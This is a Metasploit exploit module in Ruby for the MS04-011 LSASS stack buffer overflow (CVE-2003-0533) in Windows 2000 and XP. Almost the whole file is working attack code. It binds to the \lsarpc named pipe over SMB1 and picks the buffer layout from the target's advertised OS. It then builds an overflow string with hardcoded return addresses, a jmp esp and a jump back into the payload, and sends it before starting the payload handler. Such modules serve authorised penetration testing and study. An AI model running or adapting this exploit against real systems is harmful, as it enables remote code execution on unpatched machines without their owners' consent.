##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
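class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # MS04-011 / CVE-2003-0533: stack buffer overflow in the LSASS
  # DsRolerUpgradeDownlevelServer RPC call, reached over the \lsarpc named
  # pipe using SMB1 + DCERPC. The return address and buffer layout are picked
  # from the OS version string the SMB server advertises, not from the
  # 'target' option (see #exploit). Reliability, stability and side effects
  # are recorded as UNKNOWN below; treat the module as potentially disruptive
  # to the remote LSASS process.
  #
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the LSASS service, this vulnerability
          was originally found by eEye. When re-exploiting a Windows XP system, you will need
          to run this module twice. DCERPC request fragmentation can be performed by setting
          'FragSize' parameter.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2003-0533' ],
          [ 'OSVDB', '5248' ],
          [ 'BID', '10108' ],
          [ 'MSB', 'MS04-011' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Space' => 1024,
          # Bytes the encoder must keep out of the payload for these layouts.
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # The two OS-specific entries only supply the return address used by
        # #exploit, which indexes this table by position (targets[1],
        # targets[2]) after fingerprinting the peer; selecting them by hand
        # does not change what is sent.
        'Targets' => [
          # Automatic
          [
            'Automatic Targetting',
            {
              'Rets' => [ ],
            },
          ],
          # Windows 2000
          [
            'Windows 2000 English',
            {
              'Rets' => [ 0x773242e0 ],
            },
          ],
          # Windows XP
          [
            'Windows XP English',
            {
              'Rets' => [ 0x7449bf1a ],
            },
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2004-04-13',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # SMB1 is forced in #exploit, so the protocol-version option is
    # meaningless here and is hidden from the user.
    deregister_options('SMB::ProtocolVersion')
  end

  #
  # Connect over SMB1, bind to the LSARPC interface on \lsarpc, fingerprint
  # the peer OS, send the crafted DsRolerUpgradeDownlevelServer request
  # (opnum 9) and then start the payload handler.
  #
  # No request is sent when the OS string is not a known layout. A DCERPC
  # fault of 0x1c010002 is reported as "patched"; no response at all is
  # treated as expected (the overflow is not supposed to return cleanly).
  #
  def exploit
    connect(versions: [1])
    smb_login()

    handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
    print_status("Binding to #{handle}...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}...")

    print_status('Getting OS information...')

    # Layout selection is driven entirely by the advertised OS string; the
    # user-selected 'target' is never consulted.
    os = smb_peer_os
    buff = overflow_string_for(os)
    if buff.nil?
      print_status("No target is available for #{os}")
      return
    end

    # Remaining call arguments are filler: random longs, empty strings and
    # two 528-byte random blobs. Only the first string carries the overflow.
    stub = buff +
           NDR.long(rand(0xFFFFFF)) +
           NDR.UnicodeConformantVaryingString('') +
           NDR.UnicodeConformantVaryingString('') +
           NDR.UnicodeConformantVaryingString('') +
           NDR.UnicodeConformantVaryingString('') +
           NDR.long(rand(0xFFFFFF)) +
           NDR.UnicodeConformantVaryingString('') +
           NDR.long(rand(0xFFFFFF)) +
           NDR.UnicodeConformantVaryingString('') +
           NDR.long(rand(0xFFFFFF)) +
           NDR.UnicodeConformantVaryingString('') +
           rand_text(528) +
           rand_text(528) +
           NDR.long(rand(0xFFFFFF))

    print_status("Trying to exploit #{os}")

    # The response is not used: success is signalled by the payload
    # connecting back, not by what LSASS returns.
    begin
      dcerpc_call(9, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      print_status('Server did not respond, but that should be ok...')
    rescue Rex::Proto::DCERPC::Exceptions::Fault => e
      case e.fault
      when 0x1c010002
        print_status('Server appears to have been patched')
      else
        print_status("Unexpected DCERPC fault 0x%.8x" % e.fault)
      end
    end

    # Perform any required client-side payload handling
    handler
  end

  private

  # Build the NDR-encoded first string argument that triggers the overflow
  # for the given SMB-advertised OS string. Returns nil when no layout is
  # known for that OS. The payload is encoded once per branch so the length
  # written and the bytes written always agree.
  def overflow_string_for(os)
    case os
    when /Windows 5\.0/
      # Windows 2000 requires that the string be unicode formatted and, per
      # the original author's notes, leaves registers pointing back at the
      # un-unicoded data: we return into a nop sled that jumps over the
      # return address and some trash into the payload placed at +2104.
      enc = payload.encoded
      str = rand_text_alphanumeric(3500)
      str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
      str[2104, enc.length] = enc
      NDR.UnicodeConformantVaryingString(str)
    when /Windows 5\.1/
      # Windows XP uses an ascii buffer with the payload at the start and a
      # jmp esp return address at +1964. Per the original notes esp then
      # points at an eight-byte area (+1980) which is filled with a relative
      # jmp back to the beginning of the buffer, leaving about 1936 bytes
      # for the payload.
      enc = payload.encoded
      str = rand_text_alphanumeric(7000) + "\x00\x00"
      str[0, enc.length] = enc
      str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
      str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
      str[6998, 2] = "\x00\x00"
      NDR.UnicodeConformantVaryingStringPreBuilt(str)
    end
  end
end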